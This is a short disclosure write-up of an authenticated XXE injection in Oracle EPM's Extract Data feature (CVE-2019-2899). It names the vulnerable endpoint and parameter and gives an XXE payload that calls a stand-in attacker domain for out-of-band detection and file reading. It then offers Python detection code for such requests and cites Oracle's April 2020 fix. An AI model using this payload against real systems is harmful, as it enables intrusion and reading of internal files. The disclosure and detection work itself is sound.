Oracle EPM Authenticated XXE Injection (CVE-2019-2899)

This is a vulnerability which I discovered during a penetration test activity: the Extract Data feature in Oracle EPM is vulnerable to XXE injection.
When trying to extract data from Oracle EPM, a request is generated to the following URL:
https://<oracle epm>/hfmadf/faces/hfm.jspx
By injecting the request parameter named
Content-Disposition: form-data; name="event.pt1:rgnTb2:1:pt1:pc1:t1:0:cil1"
with an XXE payload like the following:

<?xml version="1.0" ?>
<!DOCTYPE root [
<!ENTITY % ext SYSTEM "http://<any key word>.attacker.domain"> %ext;
]>
<r></r>

A DNS query should then appear in the DNS logs for your domain. Successful exploitation should allow reading internal files if an attacker-controlled web server is reachable from the Oracle EPM server.
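As an added example (not from the original post and not Oracle's code), the following Python scans a multipart/form-data body for the external-entity pattern shown above, so a WAF rule or log review can flag the request before it reaches the XML parser. The boundary, the extra "viewState" part and the request assembly are assumptions; the part name is the one from the request above.

```python
import re

# Constructed sample data modelled on the request described above; the
# boundary and the "viewState" part are assumptions, not captured traffic.
BOUNDARY = "----FormBoundaryXXE1"
PART_NAME = "event.pt1:rgnTb2:1:pt1:pc1:t1:0:cil1"
XXE_PAYLOAD = (
    '<?xml version="1.0" ?>\n'
    "<!DOCTYPE root [\n"
    '<!ENTITY % ext SYSTEM "http://<any key word>.attacker.domain"> %ext;\n'
    "]>\n"
    "<r></r>"
)
BENIGN_XML = '<?xml version="1.0" ?><r><cell>42</cell></r>'

def build_multipart(fields, boundary=BOUNDARY):
    """Assemble a multipart/form-data body from (name, value) pairs."""
    parts = [f'--{boundary}\r\nContent-Disposition: form-data; name="{n}"\r\n\r\n{v}\r\n'
             for n, v in fields]
    return "".join(parts) + f"--{boundary}--\r\n"

def parse_multipart(body, boundary):
    """Return {part name: value} for an already-decoded multipart/form-data body."""
    fields = {}
    for chunk in body.split(f"--{boundary}"):
        chunk = chunk.strip("\r\n")
        if not chunk or chunk == "--":      # leading empty piece / closing marker
            continue
        headers, _, value = chunk.partition("\r\n\r\n")
        m = re.search(r'name="([^"]+)"', headers)
        if m:
            fields[m.group(1)] = value
    return fields

# A DOCTYPE is unusual in an ADF event parameter; an external (SYSTEM/PUBLIC)
# entity or a parameter-entity reference inside it is the XXE signature.
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
EXT_ENTITY_RE = re.compile(r"<!ENTITY\s+(%\s*)?\w+\s+(SYSTEM|PUBLIC)\b", re.IGNORECASE)
PARAM_REF_RE = re.compile(r"%\w+;")

def xxe_findings(body, boundary=BOUNDARY):
    """Return (part name, reason) for every part carrying a DOCTYPE; reason is
    'external-entity' when an external entity or parameter reference is present."""
    findings = []
    for name, value in parse_multipart(body, boundary).items():
        if not DOCTYPE_RE.search(value):
            continue
        if EXT_ENTITY_RE.search(value) or PARAM_REF_RE.search(value):
            findings.append((name, "external-entity"))
        else:
            findings.append((name, "doctype"))
    return findings
```

Blocking any DOCTYPE at all (the "doctype" finding) matches what a hardened parser with document-type declarations disabled would reject, and is the stricter policy.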

Vulnerability fixed by Oracle in CpuApr2020 and assigned CVE-2019-2899:
https://www.oracle.com/security-alerts/cpuapr2020.html
